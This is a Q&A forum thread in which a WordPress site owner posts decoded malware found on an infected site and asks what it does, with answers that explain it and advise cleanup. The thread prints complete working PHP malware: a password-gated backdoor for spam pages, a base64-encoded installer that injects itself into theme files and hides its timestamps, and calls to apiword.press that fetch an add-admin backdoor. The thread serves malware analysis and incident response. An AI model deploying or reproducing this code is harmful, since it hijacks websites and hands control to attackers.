# Malware research - What this code do in PHP

Tags: php, wordpress

I have been cleaning an infected Wordpress site and found this malicious code as follows. I want to know what this code do? such as steal username, password or anything else. The malware adds some codes to wp-includes/post.php and then it create a files wp-includes/wp-cd.php
Here is base64 decode

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>
```

Here is wp-cd.php file added by malware

```
<?php

//install_code

    $install_code = 'PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzsKCQkJCQlmb3JlYWNoICgkd3BkYi0+Z2V0X3Jlc3VsdHMoJ1NFTEVDVCAqIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ3Bvc3RzYCBXSEVSRSBgcG9zdF9zdGF0dXNgID0gInB1Ymxpc2giIEFORCBgcG9zdF90eXBlYCA9ICJwb3N0IiBPUkRFUiBCWSBgSURgIERFU0MnLCBBUlJBWV9BKSBhcyAkZGF0YSkKCQkJCQkJewoJCQkJCQkJJGRhdGFbJ2NvZGUnXSA9ICcnOwoJCQkJCQkJCgkJCQkJCQlpZiAocHJlZ19tYXRjaCgnITxkaXYgaWQ9IndwX2NkX2NvZGUiPiguKj8pPC9kaXY+IXMnLCAkZGF0YVsncG9zdF9jb250ZW50J10sICRfKSkKCQkJCQkJCQl7CgkJCQkJCQkJCSRkYXRhWydjb2RlJ10gPSAkX1sxXTsKCQkJCQkJCQl9CgkJCQkJCQkKCQkJCQkJCXByaW50ICc8ZT48dz4xPC93Pjx1cmw+JyAuICRkYXRhWydndWlkJ10gLiAnPC91cmw+PGNvZGU+JyAuICRkYXRhWydjb2RlJ10gLiAnPC9jb2RlPjxpZD4nIC4gJGRhdGFbJ0lEJ10gLiAnPC9pZD48L2U+JyAuICJcclxuIjsKCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ3NldF9pZF9saW5rcyc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnZGF0YSddKSkKCQkJCQkJewoJCQkJCQkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgYHBvc3RfY29udGVudGAgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAncG9zdHNgIFdIRVJFIGBJRGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkuJyInKTsKCQkJCQkJCQoJCQkJCQkJJHBvc3RfY29udGVudCA9IHByZWdfcmVwbGFjZSgnITxkaXYgaWQ9IndwX2NkX2NvZGUiPiguKj8pPC9kaXY+IXMnLCAnJywgJGRhdGEgLT4gcG9zdF9jb250ZW50KTsKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWydkYXRhJ10pKSAkcG9zdF9jb250ZW50ID0gJHBvc3RfY29udGVudCAuICc8ZGl2IGlkPSJ3cF9jZF9jb2RlIj4nIC4gc3RyaXBjc2xhc2hlcygkX1JFUVVFU1RbJ2RhdGEnXSkgLiAnPC9kaXY+JzsKCgkJCQkJCQlpZiAoJHdwZGItPnF1ZXJ5KCdVUERBVEUgYCcgLiAkd3BkYi0+cHJlZml4IC4gJ3Bvc3RzYCBTRVQgYHBvc3RfY29udGVudGAgPSAiJyAuIG15c3FsX2VzY2FwZV9zdHJpbmcoJHBvc3RfY29udGVudCkgLiAnIiBXSEVSRSBgSURgID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkgLiAnIicpICE9PSBmYWxzZSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoJCQkJCgkJCQljYXNlICdjcmVhdGVfcGFnZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsncmVtb3ZlX3BhZ2UnXSkpCgkJCQkJCXsKCQkJCQkJCWlmICgkd3BkYiAtPiBxdWVyeSgnREVMRVRFIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2RhdGFsaXN0YCBXSEVSRSBgdXJsYCA9ICIvJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndXJsJ10pLiciJykpCgkJCQkJCQkJewoJCQkJCQkJCQlwcmludCAidHJ1ZSI7CgkJCQkJCQkJfQoJCQkJCQl9CgkJCQkJZWxzZWlmIChpc3NldCgkX1JFUVVFU1RbJ2NvbnRlbnQnXSkgJiYgIWVtcHR5KCRfUkVRVUVTVFsnY29udGVudCddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiIC0+IHF1ZXJ5KCdJTlNFUlQgSU5UTyBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFNFVCBgdXJsYCA9ICIvJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndXJsJ10pLiciLCBgdGl0bGVgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ3RpdGxlJ10pLiciLCBga2V5d29yZHNgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2tleXdvcmRzJ10pLiciLCBgZGVzY3JpcHRpb25gID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2Rlc2NyaXB0aW9uJ10pLiciLCBgY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnY29udGVudCddKS4nIiwgYGZ1bGxfY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZnVsbF9jb250ZW50J10pLiciIE9OIERVUExJQ0FURSBLRVkgVVBEQVRFIGB0aXRsZWAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndGl0bGUnXSkuJyIsIGBrZXl3b3Jkc2AgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsna2V5d29yZHMnXSkuJyIsIGBkZXNjcmlwdGlvbmAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGVzY3JpcHRpb24nXSkuJyIsIGBjb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcodXJsZGVjb2RlKCRfUkVRVUVTVFsnY29udGVudCddKSkuJyIsIGBmdWxsX2NvbnRlbnRgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2Z1bGxfY29udGVudCddKS4nIicpKQoJCQkJCQkJCXsKCQkJCQkJCQkJcHJpbnQgInRydWUiOwoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVVJMX0NEIjsKCQkJfQoJCQkKCQlkaWUoIiIpOwoJfQoKCQppZiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyggJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gKS4nIicpID09ICcxJyApCgl7CgkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgKiBGUk9NIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4nIicpOwoJCWlmICgkZGF0YSAtPiBmdWxsX2NvbnRlbnQpCgkJCXsKCQkJCXByaW50IHN0cmlwc2xhc2hlcygkZGF0YSAtPiBjb250ZW50KTsKCQkJfQoJCWVsc2UKCQkJewoJCQkJcHJpbnQgJzwhRE9DVFlQRSBodG1sPic7CgkJCQlwcmludCAnPGh0bWwgJzsKCQkJCWxhbmd1YWdlX2F0dHJpYnV0ZXMoKTsKCQkJCXByaW50ICcgY2xhc3M9Im5vLWpzIj4nOwoJCQkJcHJpbnQgJzxoZWFkPic7CgkJCQlwcmludCAnPHRpdGxlPicuc3RyaXBzbGFzaGVzKCRkYXRhIC0+IHRpdGxlKS4nPC90aXRsZT4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBrZXl3b3JkcykuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IkRlc2NyaXB0aW9uIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBkZXNjcmlwdGlvbikuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0iaW5kZXgsIGZvbGxvdyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIGNoYXJzZXQ9Iic7CgkJCQlibG9naW5mbyggJ2NoYXJzZXQnICk7CgkJCQlwcmludCAnIiAvPic7CgkJCQlwcmludCAnPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCI+JzsKCQkJCXByaW50ICc8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPic7CgkJCQlwcmludCAnPGxpbmsgcmVsPSJwaW5nYmFjayIgaHJlZj0iJzsKCQkJCWJsb2dpbmZvKCAncGluZ2JhY2tfdXJsJyApOwoJCQkJcHJpbnQgJyI+JzsKCQkJCXdwX2hlYWQoKTsKCQkJCXByaW50ICc8L2hlYWQ+JzsKCQkJCXByaW50ICc8Ym9keT4nOwoJCQkJcHJpbnQgJzxkaXYgaWQ9ImNvbnRlbnQiIGNsYXNzPSJzaXRlLWNvbnRlbnQiPic7CgkJCQlwcmludCBzdHJpcHNsYXNoZXMoJGRhdGEgLT4gY29udGVudCk7CgkJCQlnZXRfc2VhcmNoX2Zvcm0oKTsKCQkJCWdldF9zaWRlYmFyKCk7CgkJCQlnZXRfZm9vdGVyKCk7CgkJCX0KCQkJCgkJZXhpdDsKCX0KCgo/Pg==';

    $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

    if ($wpdb -> query('CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'datalist` ( `url` varchar(255) NOT NULL, `title` varchar(255) NOT NULL, `keywords` varchar(255) NOT NULL, `description` varchar(255) NOT NULL, `content` longtext NOT NULL, `full_content` smallint(6) NOT NULL, PRIMARY KEY (`url`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;'))
        {
            $themes = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

            $ping = true;

            if ($list = scandir( $themes ))
                {
                    foreach ($list as $_)
                        {
                            if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
                                {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
                                        {
                                            if (strpos($content, 'WP_URL_CD') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                                                }
                                            else
                                                {
                                                    $ping = false;
                                                }
                                        }

                                }
                        }

                    if ($ping) {
                        $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                        @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
                    }
                }
        }

    if ($file = @file_get_contents(__FILE__))
        {
            $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
            $file = preg_replace('!<\?php\s*\?>!s', '', $file);
            @file_put_contents(__FILE__, $file);
        }

//install_code_end

?><?php error_reporting(0);?>
```

Answer (score 5):

I know it's an old question, but maybe my answer will help someone. The code pasted here is coming from pretty dangerous malware that besides modifications in post.php and functions.php creates file containing a backdoor: **/wp-includes/class.wp.php** - at this point malware creator can do pretty much anything he like.

At the moment of the infection malware is looking for other copies od WordPress everywhere where it can, then infect them as well.

With this malware detected you have to assume that all files that could have been accessed and overwritten from within WordPress directory may be infected or modified. The damage and reach of this malware is limited only by file and user permissions that your web server have at hand at the moment of the infection.

My best advice is to remove everything that could have been touched by the malware and load backups of both files and databases from before the infection. The important thing is to get to know when it happened, so first find the source of infection (usually a modified 'premium' WordPress plugin downloaded from shady website to save a few bucks - but hey, I'm not judging) and check when it was installed exactly.

I decrypted and collected complete source code of this malware and put it on GitHub, so you can analyse it's code by yourself:
https://github.com/ecrider/Black-SEO-WordPress-Malware

Comment: just found out, this malware circulating from plugins downloaded by https://dl-wordpress.com/wordpress-plugins/

Answer (score 0):

On a first view this code doesn't steal passwords, but grab the data from your posts. To clean this, you need to update all the core file of your WordPress. And reinstall all plugins and themes.